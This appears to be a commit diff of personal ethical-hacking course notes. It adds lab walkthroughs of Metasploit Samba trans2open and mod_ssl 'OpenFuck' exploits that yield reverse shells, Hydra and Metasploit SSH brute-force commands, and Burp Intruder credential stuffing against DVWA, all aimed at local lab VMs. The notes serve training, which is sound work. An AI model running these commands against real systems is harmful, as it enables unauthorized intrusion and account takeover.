exploit done

peh/2-lab/README.md

@@ -6,6 +6,8 @@
 >
 > 🔗 [VMware Workstation Player](https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html)
 >
+> 🔗 [VMWare Workstation Pro (Free)](https://support.broadcom.com/group/ecx/productdownloads?subfamily=VMware%20Workstation%20Pro)
+>
 > 🔗 [VirtualBox + VirtualBox Extension Pack](https://www.virtualbox.org/wiki/Downloads)
 >
 > **O.S.**

peh/3-eth-hack/capstone.md

@@ -0,0 +1,10 @@
+# Capstone Labs
+
+Import all the [VMs](https://drive.google.com/drive/folders/1xJy4ozXaahXvjbgTeJVWyY-eUGIKgCj1) into [VMWare Workstation Pro (free)](https://support.broadcom.com/group/ecx/productdownloads?subfamily=VMware%20Workstation%20Pro) or Virtualbox and change Network adapter to `NAT`.
+
+## Blue
+
+```bash
+
+```
+

peh/3-eth-hack/exploit.md

@@ -42,4 +42,148 @@ nc 192.168.31.131 4444
 
 ---
 
-## Staged vs Non-Staged payloads
+## Staged vs Non-Staged payloads
+
+**Non-Staged payload** - sends exploit shellcode all at once, larger in size and won't always work
+
+- Metasploit e.g. `payload/windows/meterpreter_reverse_tcp`
+
+
+
+**Staged payload** - sends payload in stages, less stable
+
+- Metasploit e.g. `payload/windows/meterpreter/reverse_tcp`
+
+---
+
+## Metasploit (SMB attack)
+
+```bash
+searchsploit samba 2.2
+```
+
+![searchsploit samba 2.2](.gitbook/assets/2024-07-13_09-03-53_601.png)
+
+```bash
+# Run Metasploit
+msfconsole
+
+search trans2open
+use exploit/linux/samba/trans2open
+options
+
+set RHOSTS 192.168.31.130
+show targets
+
+run
+```
+
+- This does not work, since it is using the `linux/x86/meterpreter/reverse_tcp` staged payload.
+- Try with another payload
+
+```bash
+set payload linux/x86/shell_reverse_tcp
+run
+```
+
+![root on Kioptrix VM](.gitbook/assets/2024-07-13_09-10-10_602.png)
+
+- Gained reverse shell via Metasploit
+
+---
+
+## Manual exploitation
+
+Use [OpenLuck](https://github.com/heltonWernik/OpenLuck) to exploit [CVE-2002-0082](https://nvd.nist.gov/vuln/detail/CVE-2002-0082) - [Apache mod_ssl < 2.8.7 OpenSSL - Remote Buffer Overflow](https://nvd.nist.gov/vuln/detail/CVE-2002-0082)
+
+- Follow usage instruction to compile the exploit and run it against the target machine
+
+```bash
+git clone https://github.com/heltonWernik/OpenFuck.git
+sudo apt-get install libssl-dev
+gcc -o OpenFuck OpenFuck.c -lcrypto
+
+./OpenFuck
+
+# check an offset for Apache 1.3.20 
+# ./OpenFuck target box [port] [-c N]
+```
+
+```bash
+./OpenFuck 0x6b 192.168.31.130 -c 40
+```
+
+![](.gitbook/assets/2024-07-13_09-24-35_603.png)
+
+---
+
+## Brute force attacks
+
+- Brute-force attack `SSH` with weak/default credentials
+
+➡️ [hydra](https://github.com/vanhauser-thc/thc-hydra)
+
+```bash
+hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.31.130 -t 4 -V
+```
+
+- Use the same with Metasploit
+
+```bash
+msfconsole
+
+search ssh_login
+use auxiliary/scanner/ssh/ssh_login
+set RHOSTS 192.168.31.130
+set USERNAME root
+set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
+PASS_FILE => /usr/share/wordlists/metasploit/unix_passwords.txt
+set THREADS 10
+set VERBOSE true
+run
+```
+
+---
+
+## Credential stuffing and Password spraying
+
+[**Credential stuffing**](https://owasp.org/www-community/attacks/Credential_stuffing) - injecting breached account credentials (leaks, etc) in hopes of account takeover
+
+[**Password spraying**](https://owasp.org/www-community/attacks/Password_Spraying_Attack) - brute forcing logins based on a list of usernames with default passwords
+
+```bash
+ls -lah /usr/share/seclists/Passwords/Leaked-Databases/
+```
+
+- Setup FoxyProxy in the browser and start BurpSuite.
+- Use local vulnerable webapp like [dvwa](https://nvd.nist.gov/vuln/detail/CVE-2002-0082)
+
+```bash
+sudo apt install dvwa
+
+dvwa-start
+```
+
+- Open the login page - [http://127.0.0.1:42001/vulnerabilities/brute/](http://127.0.0.1:42001/vulnerabilities/brute/)
+
+**BurpSuite**
+
+- Turn intercept ON and send the login request to intruder
+- Highlight the username and password values, and add them to the payload positions
+- Attack type - `Pitchfork`
+
+![](.gitbook/assets/2024-07-13_09-53-02_604.png)
+
+- **Payloads**
+  - for each payload set, paste the usernames list and password
+  - Start the attack
+    - check the response for Status change and Length
+
+![](.gitbook/assets/2024-07-13_10-10-23_605.png)
+
+![](.gitbook/assets/2024-07-13_10-10-38_606.png)
+
+![](.gitbook/assets/2024-07-13_10-20-20_607.png)
+
+---
+

peh/peh-references.md

@@ -38,6 +38,7 @@
 ## Lab Set Up
 
 - [VMware Workstation Player](https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html)
+- [VMWare Workstation Pro (Free)](https://support.broadcom.com/group/ecx/productdownloads?subfamily=VMware%20Workstation%20Pro)
 - [VirtualBox + VirtualBox Extension Pack](https://www.virtualbox.org/wiki/Downloads)
 - [Kali Linux](https://www.kali.org/)
   - [Kali VM Installation - VMware - syselement](https://blog.syselement.com/home/operating-systems/linux/distros/kali-vm)
@@ -113,10 +114,13 @@
 
 - [Hacking with Netcat part 2: Bind and reverse shells](https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/)
 - [netcat](https://netcat.sourceforge.net/)
+- [Metasploit Unleashed - OffSec](https://www.offsec.com/metasploit-unleashed/)
+  - [Apache mod_ssl < 2.8.7 OpenSSL - Remote Buffer Overflow](https://nvd.nist.gov/vuln/detail/CVE-2002-0082)
 
-## Buffer Overflows
-
-
+- [Top 13 Vulnerable Web Applications and Websites for Ethical Hacking Practice | by ByteBusterX | Medium](https://bytebusterx.medium.com/top-13-vulnerable-web-applications-and-websites-for-ethical-hacking-practice-1850c6163e89)
+- [Damn Vulnerable Web Application (DVWA)](https://github.com/digininja/DVWA)
+- [Credential stuffing](https://owasp.org/www-community/attacks/Credential_stuffing)
+- [Password spraying](https://owasp.org/www-community/attacks/Password_Spraying_Attack)
 
 ## Active Directory